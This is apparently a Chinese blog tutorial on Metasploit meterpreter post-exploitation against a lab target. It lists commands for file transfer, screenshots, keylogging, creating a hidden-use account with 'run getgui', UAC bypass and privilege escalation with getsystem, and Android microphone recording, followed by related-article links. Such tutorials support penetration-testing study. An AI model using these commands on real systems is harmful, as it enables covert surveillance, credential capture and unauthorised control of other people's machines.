msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)

最新推荐文章于 2024-03-12 10:47:54 发布
最新推荐文章于 2024-03-12 10:47:54 发布
阅读量4.1k 收藏 34
点赞数 3
分类专栏: 信息安全工具 文章标签: 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/126627850
版权

目录

1、文件交互指令

2、上传下载文件(windows)

3、屏幕截图(windows)

4、键盘记录(windows)

 1、先启动记录keyscan_start

2、显示键盘输入内容keyscan_dump

 3、结束监控keyscan_stop

5、创建账户(windows)

1、先看下目标靶机已存在用户

 2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

6、音频录像(Android)

 7、提权(Windows)

 方法一:

方法二:

1、文件交互指令

CommandDescription
cd{路径}切换靶机目录
cat读取文件目录
cp 复制文件到目标
mv移动到目标
chmod修改文件的权限(chmod 777 shell.elf)
del/rm删除靶机目录
dir打印靶机目录
mkdir在靶机上创建目录
rmdir靶机删除目录
edit{文件所在地址或名}编辑文件
getlwd打印本地目录路径
getwd打印靶机目录路径
lcd更改本地目录
lls列出本地目录

ls

列出靶机的目录
lpwd打印本地目录
pwd打印工作目录
search搜索文件 详细search -h
etc

2、上传下载文件(windows)

CommandDescription
upload传文件到靶机 
download从靶机下载文件

3、屏幕截图(windows)

CommandDescription
screenshot截图(Windows)

4、键盘记录(windows)

 1、先启动记录keyscan_start

2、显示键盘输入内容keyscan_dump

 3、结束监控keyscan_stop

 

5、创建账户(windows)

1、先看下目标靶机已存在用户

 meterpreter中输入:run post/windows/gather/enum_logged_on_users

 2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

run getgui -u xiaowei -p 123456

run getgui -u {用户名}-p {密码}

 注意:

        创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。

如果仍然出现错误,绕过UAC提权:

  • 先输入bg,进入后台
     

  •  使用这个模块use exploit/windows/local/ask
  • options查看需要配置哪些模块

  •  run

6、音频录像(Android)

record_mic -h        查看使用方法

 开始录音

 7、提权(Windows)

先输入getuid查看当前用户的权限,可知为普通用户。

 方法一:

getsystem

 

方法二:

使用msf模块提权

先进入msf后台bg或者background

  1. 查询可以提权的模块        search bypassuac   查看提权模块
  2. 选择一个适合当前系统的提权模块      use 1(如果没有成功就选择其他模块)
  3. 配置模块使用参数     options (session值可以在终端直接输入session得到)
  4. 可以看到需要配置session  set session   {需要提权的session id}
  5. 执行提权   run
  6. 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功  需要在还终端内在输入 getsystem 获取权限 

@Camelus
关注
  • 3
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
tiaohefenxi.rar_13分潮_K2 SD MSF文件_分潮调和常数_调和分析_调和常数
09-21
利用 MSf,Q1,O1,K1,MS4,M6,N2,M2,S2,MK3,M4,P1,K2共13个分潮进行调和分析,计算调和常数。
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
在Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
孟俊宇的博客
03-02 954
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
msf 渗透测试
06-05
msf渗透
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
Msfconsole使用永恒之蓝入侵Win7并上执行可执行文件
简介
04-30 2574
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2155
MSF初体验(二)——Meterpreter命令
MSF怎么把木马上到目标
nlj1860453的博客
01-29 277
想必Kali小白总是做好了木马却不知道怎么上到目标机器上,今天我就给大家讲一下上木马的2钟办法。第一种办法是网站上,在kali依次输入下面代码把木马上到网站。此时在目标浏览器输入kali的IP可以看到木马就在网站上,点击文件链接下载后就可以打开了。什么?怎么会有人不会查看IP?kali和Windows查看IP的方法:ifconfigipconfig。
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 7540
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
msf常用命令
licheric的博客
10-20 3025
1、download命令可以下载远程主机上的文件 命令:download文件文件路径to保存的位置 注意:windows路径要使用双斜线【linux向左边,windows向右边】 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令 2、在目标主机上执行exe文件 execute -f c://1.exe 3、创建cmd新通道 execute -f cmd -c 4、显示进程 命令:ps 5、获取目标主机的cmd—shell shell命令可以进入目标主
MSF -基于扩展卡尔曼滤波器 (EKF) 的多感器融合 模块化框架_C++_代码_相关文件_下载
07-13
描述 基于EKF的时延补偿单感器和多感器融合框架。 更多详情、使用方法,请下载后细读README.md文件
项目管理利刃之MSF
03-03
火龙果软件工程技术中心  MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功地规划、设计、开发和部署IT解决方案供了一套成熟的方法论。与具有固定框架的方法相反,MSF供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
kali 渗透msf
11-14
kali渗透测试利器
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
最新发布
天乐的博客
03-12 839
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
msf文件到服务器,Metasploit 文件包含漏洞
weixin_36213143的博客
08-12 1012
远程文件包含(RFI)和本地文件包含(LFI)是通常在编写不好的Web应用程序中发现的漏洞。当Web应用程序允许用户将输入交到文件或将文件上载到服务器时,会发生这些漏洞。LFI漏洞允许攻击者读取(有时执行)受害机器上的文件。这可能非常危险,因为如果Web服务器配置错误并以高限运行,攻击者可能会访问敏感信息。如果攻击者能够通过其他方式在Web服务器上放置代码,那么他们可能能够执行任意命令。RFI...
Msf命令详解
weixin_53747497的博客
04-10 1704
portfwd - 将本地端口转发到远程服务 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。
【2023版】Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南
QIANDXX的博客
12-29 4348
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
msf命令
qq_52469895的博客
05-19 2094
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
msf linux
09-12
在Linux中,Metasploit Framework(MSF)是一个功能强大的渗透测试工具,但是是一个敏感的话题,需要在合法和合规的情况下进行操作。在渗透测试过程中,通常是为了获取更高的限,并进一步探索和利用目标系统的漏洞。 然而,我不能直接告诉你如何在特定的Linux系统中进行,因为这可能会被滥用和用于非法目的。是一个涉及安全和合法性的行为,需要根据特定的情况和目标系统进行详细分析和评估。 如果你是一名合法的安全专业人员或渗透测试人员,我建议你深入研究和学习关于Linux系统中的方法和技术。掌握Linux操作系统的内部工作原理、用户限管理和漏洞利用技术将对你进行操作非常有帮助。 总结来说,我的目的是确保信息安全和合规性,所以我不能在这里供关于的具体指导。如果你有合法的需求,请参考相关的文档、教程和专业训练来学习和掌握技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值